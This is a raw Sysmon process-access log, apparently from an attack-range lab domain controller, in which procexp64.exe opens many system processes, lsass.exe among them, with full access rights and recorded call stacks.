10341000x8000000000000000785777Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:55.330{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785776Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:55.330{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785775Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:55.330{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785774Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:55.330{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785773Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:55.330{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785772Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:55.330{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785771Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:55.330{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785770Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:55.330{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785769Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:55.330{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785768Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:55.330{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785767Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:55.330{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785766Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:55.330{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785765Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:55.330{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785764Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:55.330{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785763Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:55.330{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785762Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:55.330{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785761Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:55.330{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785882Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:56.362{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785881Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:56.362{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785880Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:56.362{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785879Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:56.362{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785878Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:56.362{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785877Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:56.362{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785876Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:56.362{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785875Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:56.362{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785874Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:56.362{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785873Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:56.362{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785872Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:56.362{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785871Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:56.362{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785870Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:56.362{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785869Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:56.362{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785868Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:56.362{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785867Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:56.362{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785866Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:56.362{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785865Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:56.362{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785864Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:56.362{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785863Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:56.362{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785862Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:56.362{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program 